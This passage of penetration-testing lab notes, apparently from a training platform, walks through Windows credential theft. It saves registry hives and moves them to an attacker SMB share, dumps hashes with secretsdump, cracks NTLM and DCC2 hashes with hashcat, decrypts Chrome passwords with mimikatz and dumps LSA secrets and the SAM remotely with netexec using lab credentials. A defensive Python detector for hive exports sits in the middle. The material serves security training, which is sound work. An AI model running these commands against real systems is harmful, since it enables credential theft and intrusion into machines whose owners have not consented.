cmd.exe with administrative privileges, we can use reg.exe to save copies of the registry hives.
To transfer the saved hives, start a local SMB server with Impacket's smbserver.py:

```bash
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
```
Then move the hive copies over from the Windows host:

```cmd
C:\> move sam.save \\10.10.15.16\CompData
```
For secret dumping, locate secretsdump.py and run it against the three hive files:

```bash
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```
Populate a file with the NT hashes, then crack them with hashcat (mode 1000 = NTLM):

```bash
sudo vim hashestocrack.txt
sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt
```
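A defender-side counterpart to the hive-export step above, added here as an example (it is not part of the original notes): a small Python detector that scans Sysmon-style process-creation events (constructed JSON lines with `Image`, `CommandLine` and `User` fields, not real telemetry) for reg.exe saving the SAM, SECURITY or SYSTEM hive, which is what produces the sam.save/security.save/system.save files fed to secretsdump.

```python
import json
import re

# Hives whose "reg save" copies carry local credentials (SAM/SECURITY need
# SYSTEM for the boot key, so all three are worth alerting on).
SENSITIVE_HIVES = ("sam", "security", "system")

# reg.exe accepts the short and long root key names in any case.
HIVE_RE = re.compile(
    r"\b(?:hklm|hkey_local_machine)\\(" + "|".join(SENSITIVE_HIVES) + r")\b",
    re.IGNORECASE,
)
# Match "reg save" / "reg.exe save", also when the binary is quoted or
# given with a full path, or launched through "cmd /c".
REG_SAVE_RE = re.compile(r"(?:^|[\\\s\"'])reg(?:\.exe)?[\"']?\s+save\b", re.IGNORECASE)


def hive_save_alerts(log_lines):
    """Return (user, hive) for every event whose command line saves a
    credential-bearing hive with reg.exe. Malformed lines are skipped."""
    alerts = []
    for line in log_lines:
        try:
            ev = json.loads(line)
        except ValueError:
            continue  # do not let one bad record stop the scan
        cmd = ev.get("CommandLine", "")
        if not REG_SAVE_RE.search(cmd):
            continue
        m = HIVE_RE.search(cmd)
        if m:
            alerts.append((ev.get("User", "?"), m.group(1).lower()))
    return alerts


# Constructed sample events (raw strings: "\\" is one backslash after JSON decoding).
SAMPLE_LOG = [
    r'{"Image":"C:\\Windows\\System32\\reg.exe","CommandLine":"reg.exe save hklm\\sam C:\\sam.save","User":"LAB\\bob"}',
    r'{"Image":"C:\\Windows\\System32\\reg.exe","CommandLine":"\"C:\\Windows\\System32\\reg.exe\" save HKEY_LOCAL_MACHINE\\SECURITY security.save","User":"LAB\\bob"}',
    r'{"Image":"C:\\Windows\\System32\\reg.exe","CommandLine":"reg query hklm\\software\\microsoft\\windows\\currentversion\\run","User":"LAB\\bob"}',
    r'{"Image":"C:\\Windows\\System32\\reg.exe","CommandLine":"reg save hklm\\software\\contoso app.hiv","User":"LAB\\bob"}',
    r'{"Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c reg save HKLM\\SYSTEM C:\\Users\\Public\\system.save","User":"NT AUTHORITY\\SYSTEM"}',
    "not json at all",
]

if __name__ == "__main__":
    for user, hive in hive_save_alerts(SAMPLE_LOG):
        print(f"ALERT: {user} exported the {hive.upper()} hive with reg.exe")
```

Only the three hive exports are reported; the benign query, the non-sensitive hive save and the malformed line are ignored.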
For cached domain credentials (DCC2), use hashcat mode 2100:

```bash
hashcat -m 2100 '$DCC2$10240#administrator#23d97555681813db79b2ade4b4a6ff25' /usr/share/wordlists/rockyou.txt
```
DPAPI-encrypted credentials can be decrypted manually with tools like Impacket's dpapi or mimikatz, or remotely with DonPAPI. Example with mimikatz against a Chrome Login Data file:

```
C:\Users\Public> mimikatz.exe
mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
* using CryptUnprotectData API
> AES Key is: efefdb353f36e6a9b7a7552cc421393daf867ac28d544e4f6f157e0a698e343c
URL: http://10.10.14.94/ ( http://10.10.14.94/login.html )
Username: bob
* using BCrypt with AES-256-GCM
Password: April2025!
```
Dumping LSA secrets remotely with netexec:

```bash
netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
```
Dumping the SAM remotely with netexec:

```bash
netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
```